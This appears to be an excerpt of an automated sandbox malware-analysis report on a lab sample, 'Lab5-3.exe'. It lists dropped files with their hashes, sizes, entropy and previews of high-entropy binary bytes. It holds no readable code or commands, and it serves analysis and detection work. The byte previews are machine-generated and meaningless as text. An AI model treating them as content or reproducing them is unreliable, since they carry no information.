                                                                                                          SSDEEP:48:1HDo/IATm7Trwi2DLlXMBqj90J4A7gShaHfUTid3hBaUoSGFcmeykEdEElU92i:pDaIJf2D5XMBqCJp1Gx0uKeY2ElUJ
                                                                                                          MD5:780D36EF228DF0D4C450902A110A15EF
                                                                                                          SHA1:A8DC99842092FA6F28CEF1310389EBDBFA101AC0
                                                                                                          SHA-256:063DA4F656ACFB7C449B0F91650BC42D0892709342A8D8B42F42A4212D1EF097
                                                                                                          SHA-512:F5FF516070FF0D72156569C38DBF7499B2C3997415DFD4ACA3134DE232D1EFD9C9BF077DD40317776B64BE129779F0D5D64B4595DFA89E50466EC8F4AB5EDFE7
                                                                                                          Malicious:false
                                                                                                          Preview:.#YdV.3.ySO]...~.......`..c.Q...(..OEDr...n..KUN:l....N......F.....o.V..JD.|.=..'.3.~...q....s.fBk...bn.|..J.6....+...C..;....lU.<....pc.`.Zr.N.G.qjB...._.z..k.da..J.l&'aZ+7..)5.<-[..j...+..>...U.<..s...D....!...W..}.. ...NM.W.:....ovO..*f....,A..y...A......$J?7.=O....y.Io.^43.]q.0%....0.m....`df.qUgHq.f.l..lz.}|......A......J..{_uw..^..e%...jt..Fm......,rF..T.|..7CI...MIt.).g....c>o.6..D.`..*.l;.g.......v.~.......A.I._)..f...U.D.+N5sl.>P.B^l.*...SW.XT....0..<'..n..........h....<..V&Y27)...g:D......[..-..k4>.fU..]8.qV..;.....T..... ...Mz...L....".........5..!...I:.......O...!.\.C2}1=0/./'.v-.ta...s......J...<.~.......V.}.5...e?.....iA.....V.).o..T..x.L8.0.].).....mej...JL...86H.."..E..b.........I....7......B.b.rc.(/.P.....evV,-.}Y...;..d....\p..E.~a.}....9.F.Z.1.g.zs..4i..Y..B....7b?ZA..]........U.$S..;...r|s...>Mr....^f....:.N.DVZ....6.E@-..s.Z.7..iu.B=.\....<."l[..}....r.8&b7...p.....-....[...])G.....!....*.<H.Q.... @...T..v.;...3H
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3520
                                                                                                          Entropy (8bit):7.949923153828567
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:PV/c5T4WNflRfnAU8HzSIkj60gLHurL0CljvGx0uKeY2ElUJ:9/EF/feHVoVL0EjM0Cb
                                                                                                          MD5:EF0B4610E9E907D92776B34F8BD75590
                                                                                                          SHA1:9FB595082CD3067005EB4DFA125E2503E34F4318
                                                                                                          SHA-256:7716B6EB9C392B53FBF7200C9598B38696D28C5D9A1FA2207058699AA02242BB
                                                                                                          SHA-512:A95E9A7B776979FFB8B9A2ADA16CBFD76EF74CC9BC172BCBDB831AE147B5C3D01626BBB5D3F90F490889DC05A3A15F3A5A95A2A84DC11ED9CF6E730A289BB082
                                                                                                          Malicious:false
                                                                                                          Preview:....~..$...\........J.Z:$....D....&.._f.M.)f.......G.V.....C2.7.............#3..66~...v.voO..v.T.)#.p....v\.S..J..8...gm0._.+5zA'...K.....`.....$d.....SC...&7..Q.g.N.....l}.,1.u?....o;...a...~.FC......R{ib.h.m$..[g..z.P...~MP.;.!5.J......F#..(Z..wj..1.....R.+......<...f.....8x...Y.....>..B.T\...T.8Z..'.-...../z]d....+.j.......Ya..u.~..._....'.......n.Ia.a..9}..t5.6.........i...S78...S.@..O<.M.aE.gB..#.......T..%...f.p.......ee.[.W.....k...Y...U._.d...GzCx..|X.(@...Zf....#..^(].z.&T..r...i.........t-........V.!#g..]4.......p..m.....A...Me.P.l..D.x9].@....0~.*,...8..] *V9..a.,..O7.../..6.K....u.v...'t..."l...{...b....j.Q~....+@Z...^..2..'.WK.........*5.:.....k......t=......0[76l`.@....Z..Z.|..%.k.R=.#....U<.lG...n.Zg...}x..v..T.%.v=.......(yR.U..n...._..YC.ZD:..N.D.4....2K9....B.Q..m.N.M...u....8..[.ntu ^.......C0'..9 o...S....;8..@.f2o.......tD.....M..b....M.U..>...u~k.........a...P.B..o.CK.#....Z..8..XiK1...7.H..`M..S0..L......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2448
                                                                                                          Entropy (8bit):7.9252349794438075
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:EA2eQiWk8HyKhBOh5vG+m4FxwqNVNwAlpHfUTid3hBaUoSGFcmeykEdEElU92i:EA2Ioj8fvG+m4bwqNTxAGx0uKeY2ElUJ
                                                                                                          MD5:95163D48D5C0352E6B765128D1D9F49E
                                                                                                          SHA1:556136EE4970C5707E6ED6817A6AEE3CC0A90C2E
                                                                                                          SHA-256:DEC6B30D2A4018722F3EF013448FB14A43E7C331236609DD5C6A4DDC4B7503D0
                                                                                                          SHA-512:6F019E989686A407E045E84456EDBED3227A9E0780AA4E6F4DC3D5B2A78C0731D4F761C10274417B50D56DD54B9BE0750BD9420B2E3B165625A70A561507416C
                                                                                                          Malicious:false
                                                                                                          Preview:..}x:..8{..@.!z.@..Qm.Yx@.7...4..L. .|.T.w......P....J....JI...=...c.J...V.*O.>...i....S..U.i.._..2o.'..&.Uu-]".<tK......../.%.......<3T.......,,:{....!.~..:r..<c...X&z.Cx?..3z....b.Y.5sl(QVRq....lv....;\$..&A..........J..3.*....j.vd&..(...M.G.L.I.hQ....C.33.....I.X.`~+.v.M>..{C.........?...6!W].#.P..OYZ....T.y..^...\....$m.....}'N"P.<.|.rX..;E..%.==.R....rt..~./...&...$....v.a......P.e..pWq..._..........|.p>.:.z-...6].(.h..u.7j.7.m..0.L.j.{.R?.N.s..<._'....L.>@..HY...H...Ap-r4.%lW...=r..E#......:BR..............Y..^^.....G.,y7..X..H..L1:.,.o..-...zK3D.:..L....5..[.bid..q5S..)..4.....K,..J*UG....v.....Ek.%V.5.......G... ........`G...Sdl..I..O.Wa.#`:.^.v.&q.$.../n;.B.^...s....&....-:o..Sh......v..?W.....!j..s.c..t......%.....\a..L`. ..I/+.dy.O.........t.:pZ.b...auW.fuj.X.8.[..l....c.M..@>....3..g... .E9c..K...gI.j.#...B.F-.7.`._...$..|.W.........2.-.5.Pu6.IW...as.]..{.^k.d.iM..._U...!........] .....P.a.q..l}..p..E.SX4.o.,f..8.r..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3152
                                                                                                          Entropy (8bit):7.9406557471654775
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:/XnW7kdz0ofSIadjtW8KnSa7XGx0uKeY2ElUJ:/XG0fK1tzK37E0Cb
                                                                                                          MD5:75B8C6BD071E4199D4D0717F559ECCE0
                                                                                                          SHA1:A87A76DEF116A55A43909C04CE94A63B341C0BD9
                                                                                                          SHA-256:A95A119316E687E43ED8C5F7A41D261F6032F12E6F248262D640B5E3C89FE4BE
                                                                                                          SHA-512:5750D94A9F8AF2909E863A1F9D6BAC0E1080D0C35EC6A7582BA6CA2760B9A32A6ED75E07D248ABD447E77A29DB738FEF7D74E4D7FDF52968788B5D441EBA72F2
                                                                                                          Malicious:false
                                                                                                          Preview:u....h....wV...F.S..^.h.| NPAm.l@.m....[*@5'X..#..w....KV.x....*...*Y.].p.W...S(.\....~.%.....2.CXl`.qi?..0./...6W...*...,:.O.C..%c....jG...Z..w.[..3u&....l.MK.p(Z..p.~^.....F%M*y:..f.c0.;&.i...-T.r_\.....{.....I.f).`..+6..n[.3).5.\......Vt .(.).....X DH..B..m...N..^.'.........}1..WLnYN.%.Gt$C..x.0......R',$..^.x.A.5......P.Oi.OI=l"\.M....z.7....z.|em.U..9...R...P.V..}.).x.iT..l......$dWpln.9#..l..?|.........s......o.F7J(....%...<o.....[....h....wL.\5...........s.X_.x..^0{C.2k..X.....I.@....FN..V.X.l.....+.hI..DI/e.S...md......\.......=.6...IJ...(.C..*..&-..JZc.U.pu..|.....#..}...-..4.Q..e..%.z.B..A@.y.T.o.N.]..-....IZpfcS........D...zn.W.... . ...w../2.;.<s.9W...D.['F;o0.|..,..9.7...%..7....."..n?.-..Z..C/j.t...d\.n...X.J........&.f..'.eY..`G.............zC.......... '.A_}z....R.T....5...Y.O..nz-2|.df#~{.[).}H........W..65]w+.7.. ..\.S...8.0....2.{j/..Z.-...M..y[zB.,=U.._`..rE..w.'8\~.K...k.h.....>.....5w........j..A..|.....!...'..G
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.906419725880808
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Sg+FmAxJQs6WFgcEouI/9OCHfUTid3hBaUoSGFcmeykEdEElU92i:S3f4wO9Gx0uKeY2ElUJ
                                                                                                          MD5:E6FB86BCAE398269AEE1F88FFA35D745
                                                                                                          SHA1:0065EC18E15A113704B90C18A32FEE2B70075615
                                                                                                          SHA-256:7343F412FA213CC6CB7C50CC2CCE2DBC09634D8A2CEB6C696D02B4A8C64C1700
                                                                                                          SHA-512:313AC31E9E6F91501FCBF0DCC51CA2BB4538DED766AEA54304D29941E685C9FFB10F252A44D5F767F5124E89DC8F976F0738E460C35DCA97EE1D9C5C35A39E66
                                                                                                          Malicious:false
                                                                                                          Preview:..$....Q...Z...6...0D.'3s...........B.R.._p.......?xt..L=.@..mQ...O..YjFL.............9.p@.A..O....8U....0.Ot...4.w.K.[..)[?c.=.U=.v...*..I".p....>=....y...........(..F.q...cU)....8..u[....._F:..'..GU.(.n.....q.j....t..u....y...@.>T...&*.......W....,8*...Y..7.t....#52....H(.'g.'....&..qa:.W.j$.e....@.>.;..f^y.|5K.{9..3.1.YZ....u$.Z.hw......Me...;..os.-`OXC*c..F...&{.E...........V.5.q.f.a..<.2k.L-.}$.*S~`.%...U.b.ax....SO.U..1.Iq..f^8....A...>..<...-2..;0B,.e.'6P...OH.p.IM.".;...Dt..8....j...3L.../...G.RT.Ns.b..L$..-.0n....{....k.y.'.T}"%Z......e...+F....`.....,..e...)qYpQN..j:e.4n.....o......u...!XF.....$B9{...e\..R.wE.Pg1OnV....X/<....~#-...T.r.V.&.j.......z.cGn...&O..6.@<.T.].qy..IZ.._..q......d..o..t._wp...98w9..fF@.x......G....E.?. >.....U...Xk.2.nX7..c/....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2832
                                                                                                          Entropy (8bit):7.9282134557429025
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ZacOIFx5YDr10N6h8snU5Eiytabq7DHfUTid3hBaUoSGFcmeykEdEElU92i:Zm+TYV0qjnyETx8Gx0uKeY2ElUJ
                                                                                                          MD5:A7B4CC786A940A38B127F5644118D7F7
                                                                                                          SHA1:57D0C086C4A460B3132F1B037F85AD3FBD822691
                                                                                                          SHA-256:DC6C3C4A7272FAB0685D348236BCD9D0BF5FC0DA0091F60C66860CF74130137F
                                                                                                          SHA-512:C02F8E94171E766C8F72AFBA4B75B94D2ADC02FE3FDADF312EF5208C5B2C936B80AD08D641D0DA1E648E1B10EBDE39D933544AF00D927A8300B5B9AE12AAA5B7
                                                                                                          Malicious:false
                                                                                                          Preview:,.q..TJ.ky&..*....$.....5....1C..........v..G/...$6....".l.(.f.Z.x;...,..z...Rh..f.Tt......a.y.}^...?c.......I....<....w....2fs...q.H.Y..O....j~...T..5.3.\...y.g..<...\:...,.7.|.....Mn,.'.?.ZG...y-.....r....^Or..T.9)W.y....Wh.m.(.q.o..:.M.e-.5&r.(..eG_c.g..M..!.x...L.q..i..(EW..@.><...[..{.8]....-..8.mw<...'.2..$.W@.q.u.3.....^?t...XJ..F...g..~...%..C.Q..z.L.L\\..E.i..k.D(..o.D.e|%..^O&.....I..z..1..T..n.o..O:..@-........i...,ky..g...!I.........dj7.....m=.. '..h.t..'~...........j...L:P..O0.^...".G.".o.6w]+.A&.\.. ..._.L.....j1WQ.wH.7....x.`.....c..4*.L....QL..........=..Z.A.,?.~Q=.....*K.9....0B.U..=.H.1...i..=.v=.j...8...W.q\1!W.1ly.Q}.C,/#%u6.`>.0.5..:0.x..nE...P.c..N.X. ..x.J...{.e.....`..q.Pw...1.:RiXS..s.L.9.=42T.&.+....g.>.>Ape.?.tY.n4.R'....M.1...'!..._....n_.,F.0..GoB..\-6T..l6..]Y+..>m.... [6..gZ.cy..qC.r.sD`...I...s.F<....l.rT.....^\.d\>...z.`.x.L.i=..>...T..!.Q@....m'..~.Q.....a_.......x...l.<e-$.|..h[...,\.s...@..l...G...wS.#.3...n"$p.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2464
                                                                                                          Entropy (8bit):7.924882652613026
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:W19DH3xLsraqgiAlzesDQ1ebDklRbHfUTid3hBaUoSGFcmeykEdEElU92i:W1ZBLWBYBes01eblGx0uKeY2ElUJ
                                                                                                          MD5:4D6D5F65E8CC2B931A4C393398E55E81
                                                                                                          SHA1:F1DCDC710BB93A5F957AC03D714BC72866CCD65E
                                                                                                          SHA-256:AE4429727BF574C0D2703EB62FBF12334273C0BE067187CDCA55F13C328D844A
                                                                                                          SHA-512:0147E611ECB7DCE2FD97BADCA78276218CE4C0CEC39D96D3EA6702E2F4091359124286BED46CEF19B5C58BB58FE6F8E07C2E3F5814155ACA0929BD3544785B54
                                                                                                          Malicious:false
                                                                                                          Preview:.+.9..`2.m.<..Z&.......U.k..8.<U..#N.8.....sK._.....S&./..z..l.D..C...a..h.."u.~...Lm.V.i.D..#.........{|G.....[B?..r..O.?.5&..T,..7P.xw)......8'.J..-K`......o....d.|3.D..7..AM....5.k3..Z9..lzO..[....'P..A.{.[.TT.it.=..M.....z..f x.3M...j..Q..+.c..6.D.>r...WJ?..d....z....#....?.G.O.}e..Bp...A.+..w;.... B.d....P..p...*...R.mH.g._5T)q.GLc.G..}]!..Y0-.....p.M...E.5.......s......g*.B...`..k...?B..t..I.s..3.:.|...R.z+.B.LW....c...ab..!.(..U.k..`...~...N.;.@g.X.O?....5...e.G.A.<..0H...'..K".2I..{F.&..`....l...........t.p?.@...X...wN.c..:...2....2~.....F.. U.#....bJ....K..{.......}>..n7.>=.R.&....dr...9......~.../.Q.R..!.[T........P....x8.....]..U....".PH19.K.Bj.|R.=..'..Y...&Z.eD.N.A.>.D.(........}. .b...N.....N...=...F...y4^.\..`....Bg...V!...........6...~...k...@.SU%..V.=.1k.W..WH..8.v.p|(..5.7..;..o.|...F...Q./.`....!;..(.7..?._p...3R......R.O/;.9N2.F...].k....P:;./..k.'6.o\.Z~.a|.lR.I.nS....Uht.8...q..YHlai...9wX....$.{M.....59l|
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2272
                                                                                                          Entropy (8bit):7.91446505818053
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:aq1ZuMTEmzrV2gRvM8TLUOHfUTid3hBaUoSGFcmeykEdEElU92i:L13RtM8LUhGx0uKeY2ElUJ
                                                                                                          MD5:F34BC1281CD075B4C0CB83BC7F430469
                                                                                                          SHA1:4896CD503EDCCCB1867FC00D9A08714D381BBFD7
                                                                                                          SHA-256:4F3EB2ACA518AE51369E610C04998EF6E2769AD7B5B88BE5E145EE3C29E8CCC7
                                                                                                          SHA-512:3A83DDC2933460A5703B62A38F2177A8AFF36C74B1E2D8734C94690D7EC6F296457A66720C4D511FF88541E90F8D49F15E595D5BB63BB7D4A00623472C156FC3
                                                                                                          Malicious:false
                                                                                                          Preview:U1.z.?...q.U\..._!...*6.v..;....[L....W.....Ioo........eUj..2#ET........K...sOQ4U.z;nR&....F........I,...Wz&.l.}p...z.t.jO...)...x%...(.m..G:E....&"...^JU))..eQy.%~..d4@*&....J.|P.M0..h...).....G....3X.*...f.F..g.`t.{O.u..d..V@..n~@...O......dK..[Mt...0`...uD.O.c....Bb......72|..f....){...j..nr1{......:U.........8....a.c.%...j.r...../...#.q...`...#.2......z.....#...j.._.O.].9...r....;T.<C.%.3....f....g$......L!.@.2O....X..Q...i..9N..&...E.th.r.......g..|......8...l...K...H...j..p.A/.?...$o.Veb o..3F.......].c........_....R.E....E sg.{..x&T[....+... P!...y.U.N%.#.K.....RC.T...M]........&.L.nj...(..t.~i.e.-..BrQ.?...L...!.3...@..f.D1.?..K..oL.5D....._..aV.".3T.8....6[Jgy.u.W........6:{N......U.3<..........a..o..!yF.._...f....3...M{...BK....">0.Ap.......$,.e..8...(.s`.t...e.j.w...9....T..f...6q. @..jJT ...}...E..y-..o.>.....o....G.E9...r..V...{...BW....<.`.R.252..).Y&..*...6k..T.4j.6...Z.R....mj$...?..C%.(>j.`lS..^.Q...rp....;....M
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.927529554382924
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KvezZb6h/2x55p22d1Jd7RWRJVqQdoT5U3G6vckVd5HfUTid3hBaUoSGFcmeykEO:ie56h/2/5dd1Jd7QdI5q3vck/6Gx0uKk
                                                                                                          MD5:D2E91D9EB49B51B7CF6214F4FBAAABC6
                                                                                                          SHA1:F550953B48BB7866B25ACE5A63AF8AA1F68BE4E0
                                                                                                          SHA-256:411C4A5EC5EBACDF85F8BB1C23C3FC0DA17C6746B0119AE647F0B33D4A2D34BE
                                                                                                          SHA-512:DDE256A281C8040807590D304AA8C29B3550A3EAFEF49D15A229AAD4FC18FEAAFB2FFA9CBE22DA568ABA99F1E74445C87ACB5CD3B2D8CD47C8E30D479C7364AC
                                                                                                          Malicious:false
                                                                                                          Preview:2.>g..{=fA..S..s...6.C...?......,.c!E.D..E.:....t0.......6.........U....A2;.W.....-.E..S.A..D..l...D.E...#9!.~.8s....8S].cDL.C:.x.......g~.._y...J+....8..Q^:%...9E.+h..8.......M.A...L0.L....f....Q..".....~_+..4.....44.y.,s......v..~7L..f.7O.o'....Ezy..../.|....a+`f..x.S.....)B.9DLZAok#D.W.N.} ..cN\J.-vi.......tN.U....i.+.wy.;.]49>....F.c}.......~.VR..43.n./Dc....Tz#..i.....5D.:yD$...1CX...l_D....4. y......lS..keu.3&RV.......dl......O.:.F.....;...4.s.M.F...|..W.J.WZ...b?....&W|..J..h...h....#V.]....q._b#3..9.=...F:.j.}.i...TN}.8[..D.K@..v.w..*.<....D..ON0..`...![n(......7....3.k..[.r+.E.=.../.\</-'...E..i..Y....!...`..L......PXMx.m........W"I.X`.J...^..U.L................K.Q..q.VB.../=..=...e..=.U.VH.O.....(ws..=%W..<il..r.71i...l=.\.......VO..E.DB..T6....j..8...|....Q......l.5.G[a......r3<.....P..Y......Tm.>.X)...F.P..s..8.<v.j.h..4.C.e.e<..\.:.Y(m..%.Y.....].&Jo.#.......n..7.Ih......$. .....tR{a..I.}.$.>a............l. .&..^..zcL....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2016
                                                                                                          Entropy (8bit):7.900268311085211
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:PbAfc8txiNs1r9ClyRHfUTid3hBaUoSGFcmeykEdEElU92i:DAfHxiNs4lGx0uKeY2ElUJ
                                                                                                          MD5:FF066FC19DB5560FCD5A1998D0236F22
                                                                                                          SHA1:B00E549836CCA89AC8D7767E099788FDB713E3AC
                                                                                                          SHA-256:F8295941A85DFDB4BC0FBBEF62C4D27BA7FB5C5A4882E4C411E035757A091F81
                                                                                                          SHA-512:331C863AE468A29B69D76645200F285F5644FA7B3AEC10510588CC51E7A141E1ECFF542ED277FACE5E3FC0E8935B5D7D82DEF913F2E960B7D81E9FD354DF5798
                                                                                                          Malicious:false
                                                                                                          Preview:W.P..9......|.e.......2..........x..-;.{4....sC...bh;........X.@...1[z...b.('&...M:%....rP.".8K*Ht.8....7\m...+..w....p...c^b.3h..p5@....k..,..So.7.S2....;....M....#.[.....5O......:^.........."..P..t.ud.[l..K.<N..C;|.A.>.-(.}..V|8....O.si...j.......8^e.#v.n....s......T6~...Q&.NH.G......Y.Yi...E.....X.......d.....\r............&Mx.A.i....x.@V...%[.....Te.Y....'..V...!...[.XWC..1.:...A|.t,....'.>.B....UIK....(.F...4.....GS.....>g....i.,(Y.....3......[W..`........21.F.`..\..G&^..k_....f...NLq.!...K1.s..,._..H..lJW.f.x...S].....7>....D.o..!%J^..s..fe.!.&..Ew..]@e`..{.r....x...9..>}..r...&......pc+FbO..Q3..Q..............8...S.teW...t2#>.w..F=.aT.'.;*..&.W..........@A..]..x..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2080
                                                                                                          Entropy (8bit):7.912257414764713
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:IeFZQIFJqzrHMHfUTid3hBaUoSGFcmeykEdEElU92i:IeL5FJSrrGx0uKeY2ElUJ
                                                                                                          MD5:E2046F75DCB6BE6F736230197DB4AE0A
                                                                                                          SHA1:6C5D7FFEE684E1CFD233715601E71DF8228D597D
                                                                                                          SHA-256:85DC991D115EAAD194DCC42A2711B0B8A2C0BC88812FA92C61FE07EB1288D899
                                                                                                          SHA-512:B483D7DE643AF55656828B8250255DE401D24739FC51F68F0A14B8DDF1BD168CE27CA1A447E09BC294C0ADBBC2B28505B92A9A1580BBA41E390200EACFF1B069
                                                                                                          Malicious:false
                                                                                                          Preview:.....S[.~y_m...6\...S.m.^.d.7.S..u.E..V'>..M..#...g!.x.._.~........[.........8.5..b..,.Z..H...^....s..h.0s.....(....^|.)w.;k..v..1....K:.H`.6..A...5.p..=........'.R.yf....;<.no.....8S.......?n....O..'....4D.....Wn.R.;C.......Gn.......a.~..]...8..na.%..G.0.b3......$f..tbL......K%.!......d.W.......|.hs...\...0.k.;1=.K.["..LVc5...p...3...g.T.U?...^Kb.....(....1. .Z2.].G.,;.{....e..%[6o.{.....bB480..C..H.\.....5..#.%ElK.0...6/uP...~.k..v...Xxu...8.XC...V.T..y.g.G..n..UiW.2b....@T..8N......#..?...z......=...Oe.%1.....Kj.d..G..v......V8...@..o+..)O..P.5....P.....#r.[wC.v..;.>.T..^r...y.h..K../....;_......`$.l....1.%...L3...0..,'.m.e.pTd......|..D....=..31ne.C"..,CA:.N.gt.w+..........X.'..[^R.D..dD..F.r[.z&!4"..q>W.H..N.....'..k.}...._.w....96.......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2048
                                                                                                          Entropy (8bit):7.911326512963283
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:3nwO1BQ1YX7HfUTid3hBaUoSGFcmeykEdEElU92i:3LQgIGx0uKeY2ElUJ
                                                                                                          MD5:08A520AE2866D7915DBADAEB031F189F
                                                                                                          SHA1:068C41CAD12A34BD89BA34C58E362BF9AB823653
                                                                                                          SHA-256:E5B35A183400548E2CCA2AB7F2ED9E57907513A602E633ABA427E44BE5921A4F
                                                                                                          SHA-512:5C98C249C39570B8BC65DB3A4FE1E2E99C576759AF9397E755CB19AFEB67E79676BFD4C3BB7A740E493E2F7B0A168D3CBD47FF68E3CC5339962A0DAD30DF8EB7
                                                                                                          Malicious:false
                                                                                                          Preview:.#.p...-..N.{.....;{/......H..4I_........)c1._.... .L..=...sL&+,..0...gQ...~L.....K.c.e..A..M..\.o.J.....)..+./.c(?..#..f.l..S....L...z.y.k^RFg..bU..q.E.>.>i......N.....-....~.?.a.n...U.Tx.~HP...o.N...F[..79......%#....u`Y.>/.m.<..8.f.J.l..;.i.R...z..~...F..1....$.0......#...<m{.u...>....yV..w\l..M@.O..X.z{..j..Q...D.:eQ...v.%..R.......OZq.....=m.1{...M..S.jH.XU.2D|..[...TA.....H..cm^..2p.2H^.{.{/......k.t>.V.Edo.P*.2....Op#.&.......B.R.?O....I.K4%J.wey...;PO...Q...Q.....iQ}.~N.........%..$V.FI.+..t`s...z.N/2#.j.1.y.S.Y.+j...y.ws....NF....qM6..vP..a0.>..={v....pB..........^..@....+%.E.\...8%...6.K...E$..pS.k.nX:.".m....`.vL7.gU..-.\..c......\^2.C.[.TKu5^M.....A..C..:...OZ<2&P.?...|..T..rN.p......KZ.....>.....w.j..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2000
                                                                                                          Entropy (8bit):7.915974990726141
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:SRyo7V+YX6oRTbz3pHfUTid3hBaUoSGFcmeykEdEElU92i:RuVS8TX3qGx0uKeY2ElUJ
                                                                                                          MD5:BC3B40CE98F70635329D36933A2FC720
                                                                                                          SHA1:DF44E0DC264957C14B41A62F78E0B3D826979358
                                                                                                          SHA-256:67E8396B96B74246FCF4A07CB85924C0694EB8A586A662FCB92BD1084799855E
                                                                                                          SHA-512:4B3C8508215DF319DCE78CC74939C49ACCCF9C4521CFC17CDEA62418E4C140B9A56DA6B4A9924EF049EB705F6623EB3F85F47EA19B5024D4F46D8AFA8A0A8D50
                                                                                                          Malicious:false
                                                                                                          Preview:..|..2.@...)V..X.&.....>."..%.l...0.d..Le.[../D....ZK.o.5..g.B.~[..n.wm(..`.G..u..T........_..........K...p.............s.,..QG..3.t......W...i..y..n......&X.....\..0.........y#%..P........aX.....Y@.....=.}:....]..'...(q....(...JS.q...mI....T..].puJ.f...I.Y.;..V/M..`...c.c.p"'................[.......`..3..U..<..[;.-.=.4...Y.2]7..mY.oi..H./.c..K....n.S^81.%............6y*..M....r=.....U.".|;.....h?.8..S....}d.Tb.No"F9.Z.....;UUU.....Z..A.`..I....U.g. .g.K.#..qa.i...4.3.D...p.O.M..=).....%_..X!V...`^.}.{.#8....1Rmm.....@...#v3.K!.7.J.....EJ.....M.@...Z.......s...9..v-..)'l.h......9...b._u.r.....xH.q...Y..xp)...@=.8...f.l.6./.&r.....!....\l......P...nF~..!.......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2016
                                                                                                          Entropy (8bit):7.899879339958856
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:3BrU6Avt867wagExPDlHfUTid3hBaUoSGFcmeykEdEElU92i:3RU6AVXMagwr+Gx0uKeY2ElUJ
                                                                                                          MD5:69DE60CACD35A70B0F27B75A4B4BD2C1
                                                                                                          SHA1:D652D10689812AD7B5FD1EFB04626765B033225E
                                                                                                          SHA-256:9BD43D71BE6C7C6B85D2E2513D859ED79382EEBC47FD4110360D6B1B86FF4DC3
                                                                                                          SHA-512:96C7B8AA04B7E13B66ED28137C73BF3AA71EEED6A664803ACA5A7044F79B6DC8575B756D3DA7896D16E62425C7EA5C528EC6A4ECBA76B74C3B9FE69FF87620F3
                                                                                                          Malicious:false
